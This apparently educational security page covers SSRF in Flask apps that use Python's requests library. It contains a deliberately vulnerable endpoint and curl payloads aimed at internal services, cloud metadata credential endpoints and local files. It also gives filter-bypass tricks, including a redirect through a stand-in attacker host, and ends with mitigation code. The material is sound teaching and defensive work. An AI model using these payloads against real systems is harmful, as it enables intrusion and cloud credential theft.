PyFu

Python Requests Library SSRF via URL Parsing

Python-based Web Application Attacks

The requests library is the de facto standard for making HTTP requests in Python. It provides a simple and elegant API for interacting with web services, APIs, and remote resources.

When applications use requests to fetch URLs provided by users, they become susceptible to Server-Side Request Forgery (SSRF) attacks. The risk is amplified by parsing inconsistencies between the code that validates a URL and the client that fetches it, by redirect following, and by any additional URL schemes the application enables through transport adapters.

While requests itself is not inherently vulnerable, improper validation of user-supplied URLs before passing them to requests.get() or similar methods allows attackers to make the server send requests to unintended destinations.

The Vulnerability

Consider an application that fetches and displays content from user-provided URLs:

from flask import Flask, request, jsonify
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    
    if not url:
        return jsonify({"error": "URL parameter required"}), 400
    
    # Vulnerable: no validation of user-supplied URL
    try:
        response = requests.get(url, timeout=5)
        return jsonify({
            "status_code": response.status_code,
            "content": response.text[:1000]
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

The application directly passes the user-controlled url parameter to requests.get() without any validation:

response = requests.get(url, timeout=5)

This allows attackers to make the server send requests to arbitrary destinations.

Exploitation

An attacker can target internal services that are not accessible from the internet:

# Access internal services
curl "http://target:5000/fetch?url=http://localhost:8080/admin"
curl "http://target:5000/fetch?url=http://127.0.0.1:6379/"  # Redis
curl "http://target:5000/fetch?url=http://192.168.1.1/admin"  # Internal network

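# Access cloud metadata endpoints
curl "http://target:5000/fetch?url=http://169.254.169.254/latest/meta-data/"  # AWS (IMDSv1 only; IMDSv2 needs a PUT-issued session token)
curl "http://target:5000/fetch?url=http://metadata.google.internal/computeMetadata/v1/"  # GCP (v1 requires a Metadata-Flavor: Google header, so a plain GET is rejected)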

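A stock requests install only ships transport adapters for http:// and https://, so a file:// URL raises InvalidSchema. Local file read becomes possible when the application mounts a file adapter on its session (for example the third-party requests-file package) or fetches with urllib.request.urlopen, which handles file:// natively:

# Read local files via file:// scheme (only if a file adapter is mounted or urllib is used)
curl "http://target:5000/fetch?url=file:///etc/passwd"
curl "http://target:5000/fetch?url=file:///proc/self/environ"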

URL Parsing Bypass Techniques

Even when basic validation is implemented, attackers can use URL parsing inconsistencies to bypass filters:

# Weak validation that can be bypassed
def is_safe_url(url):
    blocked = ['localhost', '127.0.0.1', '169.254.169.254']
    return not any(blocked_host in url.lower() for blocked_host in blocked)

Bypass techniques:

# Decimal IP representation
curl "http://target:5000/fetch?url=http://2130706433/"  # 127.0.0.1 as decimal

# IPv6 representations
curl "http://target:5000/fetch?url=http://[::1]/"  # localhost
curl "http://target:5000/fetch?url=http://[0:0:0:0:0:0:0:1]/"

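# URL encoding (double-encoded, because Flask decodes the query string once before the filter runs;
# whether the client then normalizes the remaining escapes in the host depends on the requests/urllib3 version)
curl "http://target:5000/fetch?url=http://%2531%2532%2537%252e%2530%252e%2530%252e%2531/"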

# Public DNS name that resolves to an internal IP (not rebinding: the answer never changes)
curl "http://target:5000/fetch?url=http://localtest.me/"  # Resolves to 127.0.0.1

# Redirect bypass (if following redirects)
curl "http://target:5000/fetch?url=http://attacker.com/redirect?to=http://localhost/"
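To see why the substring blocklist fails, the following sketch runs a few of the hosts listed above through the same filter and then through Python's ipaddress module. The payload list and the helper name canonical_ip are illustrative assumptions, not part of the lab application, and the helper only understands IP literals and bare decimal integers.

```python
import ipaddress
from urllib.parse import urlparse


def is_safe_url(url):
    # Same weak substring blocklist as shown above.
    blocked = ['localhost', '127.0.0.1', '169.254.169.254']
    return not any(blocked_host in url.lower() for blocked_host in blocked)


def canonical_ip(host):
    """Return the canonical address for an IP-literal host, else None.

    Hypothetical helper: handles dotted and IPv6 literals plus bare
    decimal integers only; it does not resolve DNS names.
    """
    try:
        return ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return None


payloads = [
    "http://2130706433/",          # decimal form of 127.0.0.1
    "http://[::1]/",               # IPv6 loopback
    "http://[0:0:0:0:0:0:0:1]/",   # same address, uncompressed
]

for url in payloads:
    ip = canonical_ip(urlparse(url).hostname)
    print(url, "| passes filter:", is_safe_url(url), "| loopback:", ip.is_loopback)
```

Every payload passes the string filter while its canonical form is a loopback address, which is why the check has to operate on parsed and resolved addresses rather than on the raw URL text.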

Vulnerable Patterns with requests Library

# Pattern 1: Direct URL usage
requests.get(user_url)

# Pattern 2: URL construction without validation
base_url = "http://api.internal/"
requests.get(base_url + user_path)  # Path traversal possible

# Pattern 3: Following redirects to internal hosts
requests.get(user_url, allow_redirects=True)

# Pattern 4: Using user input in headers
requests.get(url, headers={"Host": user_input})  # Host header injection
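Pattern 2 depends on how the concatenated string is parsed. As a hedged illustration, assume a base URL without a trailing slash (unlike the one above) and a hypothetical attacker.example host; the standard library then shows that input beginning with @ turns the intended host into userinfo and moves the real target elsewhere:

```python
from urllib.parse import urlparse

# Assumption for illustration: the base URL lacks a trailing slash.
base_url = "http://api.internal"


def target_host(user_path):
    """Return the host the concatenated URL would actually point at."""
    return urlparse(base_url + user_path).hostname


print(target_host("/v1/items"))           # api.internal
print(target_host("@attacker.example/"))  # attacker.example
```

Comparing the parsed hostname of the final URL against the expected host, after concatenation rather than before, is one way to catch this class of mistake.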

Why requests SSRF matters from an offensive security perspective

I prize SSRF through requests because it turns the server into my proxy for everything it can reach and I cannot. From the outside, the loopback interface, the RFC 1918 ranges, the container’s sidecar, and the cloud metadata service are all invisible to me; once I control the URL, the server fetches them and hands me the bodies. On a cloud host that usually means walking 169.254.169.254 to lift IAM credentials, which is the fastest path from a “harmless” URL fetcher to account compromise wherever IMDSv1 is still enabled. Where the application has mounted a file:// adapter, the same primitive also gives me local file read.

What makes this class durable is that the bug is in validation, not in requests, so it survives naive filters. The tells I hunt for:

  • A user-supplied value passed into requests.get/post(...). Webhook senders, URL previews, avatar and image fetchers, PDF and screenshot renderers, and “import from URL” features are the usual carriers.
  • Blocklists of hostname strings rather than resolved-IP checks. Substring matching on localhost or 127.0.0.1 is bypassed with decimal IPs, IPv6 [::1], URL encoding, and DNS names that resolve inward.
  • allow_redirects=True left at its default. A permitted host that 302s to http://169.254.169.254/ defeats any check done only on the original URL, so I always probe redirect following.
  • Validation that resolves DNS once, then fetches separately. That time-of-check gap is DNS rebinding, and I exploit it with a host that answers public on the first lookup and internal on the second.

The defender takeaway: validate after resolution against IP ranges, re-check every redirect hop, and prefer an egress proxy over hostname blocklists. The same primitive is covered from the parsing angle in Server Side Request Forgery (SSRF) in Flask Applications.
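Re-checking every redirect hop can be sketched with a small loop that follows redirects by hand. This is a minimal sketch under stated assumptions: fetch_checked, the injected get and is_allowed callables, and the MAX_HOPS cap are all hypothetical names chosen for illustration, and the validation policy itself is left to the caller.

```python
from urllib.parse import urljoin

MAX_HOPS = 5  # arbitrary cap chosen for this sketch
REDIRECT_CODES = (301, 302, 303, 307, 308)


def fetch_checked(url, get, is_allowed, max_hops=MAX_HOPS):
    """Follow redirects manually, validating every hop before fetching it.

    `get(url)` must return an object with `status_code` and `headers`
    and must NOT follow redirects itself; `is_allowed(url)` is the
    caller's validation policy. Both are injected, hypothetical hooks.
    """
    for _ in range(max_hops + 1):
        if not is_allowed(url):
            raise ValueError(f"blocked URL: {url}")
        response = get(url)
        location = response.headers.get("Location")
        if response.status_code not in REDIRECT_CODES or not location:
            return response
        # Location may be relative, so resolve it against the current URL.
        url = urljoin(url, location)
    raise ValueError("too many redirects")
```

With requests, the get hook could be something like lambda u: requests.get(u, timeout=5, allow_redirects=False), so that the library never follows a Location header on its own.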

Proof of exploitation

Run the lab app (PyFuLabs/flask-fu/flask-requests-ssrf). The url parameter is handed straight to requests.get, so the server fetches whatever the client names, including loopback addresses it should never reach:

curl -sG "http://pyfu.local/flask-fu/flask-requests-ssrf/fetch" \
  --data-urlencode "url=http://127.0.0.1:5000/"
{
  "content": "<!doctype html>\n<html lang=en>\n<title>404 Not Found</title>\n<h1>Not Found</h1>..."
}

The response body is whatever the internal listener returned, confirming the request originated server-side at 127.0.0.1 rather than from the client.

Mitigation

Parse the URL properly, allow only the http and https schemes, resolve the hostname, and reject any address that falls in an internal range:

from flask import Flask, request, jsonify
from urllib.parse import urlparse
import requests
import ipaddress
import socket

app = Flask(__name__)

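ALLOWED_SCHEMES = ['http', 'https']
BLOCKED_HOSTS = ['localhost', '127.0.0.1', '0.0.0.0']
BLOCKED_NETWORKS = [
    ipaddress.ip_network('0.0.0.0/8'),       # "this network", includes 0.0.0.0
    ipaddress.ip_network('127.0.0.0/8'),     # IPv4 loopback
    ipaddress.ip_network('10.0.0.0/8'),      # RFC 1918
    ipaddress.ip_network('172.16.0.0/12'),   # RFC 1918
    ipaddress.ip_network('192.168.0.0/16'),  # RFC 1918
    ipaddress.ip_network('169.254.0.0/16'),  # link-local, cloud metadata
    ipaddress.ip_network('::1/128'),         # IPv6 loopback
    ipaddress.ip_network('fc00::/7'),        # IPv6 unique local
    ipaddress.ip_network('fe80::/10'),       # IPv6 link-local
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)

        # Check scheme
        if parsed.scheme not in ALLOWED_SCHEMES:
            return False

        # Check for blocked hostnames
        hostname = parsed.hostname
        if not hostname or hostname in BLOCKED_HOSTS:
            return False

        # Resolve every A and AAAA record; gethostbyname() returns only a
        # single IPv4 address and would miss IPv6 targets such as ::1.
        for info in socket.getaddrinfo(hostname, None):
            ip_obj = ipaddress.ip_address(info[4][0])
            # Unwrap IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1
            if ip_obj.version == 6 and ip_obj.ipv4_mapped:
                ip_obj = ip_obj.ipv4_mapped
            if any(ip_obj in network for network in BLOCKED_NETWORKS):
                return False

        # Note: requests resolves the hostname again when it connects, so
        # this check alone does not close the DNS rebinding window.
        return True
    except Exception:
        return False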

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    
    if not url or not is_safe_url(url):
        return jsonify({"error": "Invalid or blocked URL"}), 400
    
    try:
        response = requests.get(url, timeout=5, allow_redirects=False)
        return jsonify({
            "status_code": response.status_code,
            "content": response.text[:1000]
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

Key mitigations:

  • Validate URL scheme (only allow http and https)
  • Resolve hostnames and check against blocked IP ranges
  • Disable redirect following or validate redirect targets
  • Use allowlists for permitted domains when possible
  • Set timeouts so a slow or unresponsive target cannot tie up a worker indefinitely
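Where the feature only needs a handful of known destinations, the domain allowlist mentioned above might look like the following. This is a sketch, not a complete defense: ALLOWED_DOMAINS and is_allowed_host are hypothetical names, the domains are placeholders, and an allowed domain that redirects or resolves to an internal address still needs the checks described earlier.

```python
from urllib.parse import urlparse

# Hypothetical allowlist; replace with the domains the feature really needs.
ALLOWED_DOMAINS = {"example.com", "cdn.example.org"}


def is_allowed_host(url, allowed=ALLOWED_DOMAINS):
    """Accept only http(s) URLs whose host is an allowed domain or a subdomain of one."""
    try:
        parsed = urlparse(url)
    except ValueError:
        # urlparse rejects some malformed inputs, e.g. unbalanced IPv6 brackets.
        return False
    host = (parsed.hostname or "").rstrip(".").lower()
    if parsed.scheme not in ("http", "https") or not host:
        return False
    # Match on a label boundary so "example.com.attacker.net" and
    # "notexample.com" do not slip through a naive suffix test.
    return any(host == d or host.endswith("." + d) for d in allowed)
```

Matching against the parsed hostname rather than the raw string also defeats userinfo tricks such as http://example.com@127.0.0.1/, because the host the parser reports there is 127.0.0.1.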